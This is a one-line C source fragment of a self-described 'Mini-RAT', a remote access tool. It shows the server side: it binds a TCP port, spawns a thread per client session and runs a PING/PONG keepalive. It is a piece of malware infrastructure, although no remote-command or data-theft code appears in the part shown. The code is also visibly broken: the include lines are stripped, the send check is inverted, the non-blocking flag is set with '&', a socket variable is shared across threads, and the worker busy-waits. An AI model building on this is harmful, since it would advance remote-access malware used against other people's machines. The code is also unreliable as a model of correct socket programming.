#include #include #include #include pthread_mutex_t sock_mutex; void* listener(void *port) { uint16_t port_num = *(int*)port; int server_sock = socket(PF_INET, SOCK_STREAM, 0); struct sockaddr_in client_name; unsigned int client_name_len = sizeof(client_name); struct sockaddr_in name; memset(&name, 0, sizeof(name)); name.sin_family = AF_INET; name.sin_port = htons(port_num); name.sin_addr.s_addr = htons(INADDR_ANY); if (bind(server_sock, (struct sockaddr*)&name, sizeof(name)) < 0) { log_msg(LOG_SEVERE, "Cannot bind to port %d\n", port_num); return NULL; } listen(server_sock, 5); log_msg(LOG_INFO, "Mini-RAT running on port %d\n", port_num); int client_sock = 0; pthread_t newthread; while ((client_sock = accept(server_sock, (struct sockaddr*)&client_name, &client_name_len))) { pthread_create(&newthread, NULL, worker, (void*)&client_sock); pthread_detach(newthread); } close_logfile(); close(server_sock); return 0; } int ping_pong(int sock) { int ret = 0; char buffer[6]; memset(buffer, 0, 6); if (send(sock, "PING\r\n", 6, 0) != -1) ret = -1; if (recv(sock, buffer, 6, 0) == -1) ret = -1; if (strncmp(buffer, "PONG\r\n", 6) != 0) ret = -1; return ret; } void* worker(void *sock_desc) { int sock = *(int*)sock_desc; fcntl(sock, F_SETFL, fcntl(sock, F_GETFL, 0) & O_NONBLOCK); struct session *ses = find_session(init_session(sock)); log_msg(LOG_INFO, "New session created with ID=%d\n", ses->id); time_t start = time(NULL); time_t diff; while (ses->alive != 0) { diff = time(NULL) - start; if (ses->alive == 1 && diff != 0 && diff % 60 == 0) ping_pong(sock); } return 0; }